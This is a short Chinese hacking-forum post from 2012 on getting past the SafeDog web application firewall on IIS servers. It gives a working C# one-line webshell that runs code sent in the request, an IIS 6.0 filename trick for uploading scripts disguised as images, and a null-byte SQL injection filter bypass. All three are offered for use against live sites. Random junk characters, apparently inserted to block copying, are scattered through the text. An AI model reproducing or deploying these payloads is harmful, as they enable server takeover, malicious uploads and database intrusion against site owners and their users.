找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2215|回复: 0
打印 上一主题 下一主题

突破安全狗防注入及上传的一些思路

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-31 08:25:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
1、绕过IIS安全狗的一句话。
$ C0 K6 @* X' O, z' k+ I前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。2 |* K9 o7 X1 K4 D* a$ B
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。  [$ f8 z! Y) G

! P, y; n% f- R4 `  X2、IIS6.0解析漏洞遇到安全狗。2 A! Z) ^2 K4 E7 Z
文件名为% z1 s" S4 s( v2 v
http://www.xxxxx.com/sh3llc0de.asp;1.jpg% `# V9 V7 S4 e6 e0 P# P9 A
6 {% p6 R- L4 @' }9 E+ f
这样的会被IIS安全狗果断屏蔽。
) a  |/ w4 t) ~/ A改成如下名称,IIS6一样会解析:
- U4 ]9 P2 Q0 F" Lwww.xxxxx.com/;1.asp;1.jpg+ f- ]/ `. ~8 |- r3 i
$ p* ~8 T: T- B6 x9 P
3、安全狗的注入绕过。5 W0 h  z4 F# s) V- t8 s/ C' t7 U
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
# }3 ~- T) s- m6 u* O9 c但如果:
  n" u. Z$ U% o* hr00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
) I3 l  v& ]& [" A; W/ j" ~就可以成功绕过了。
" T& U, |6 w: i* k. w# f3 V. d# O7 q
/ y; C- g" |. c9 g0 G; y; E2 K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表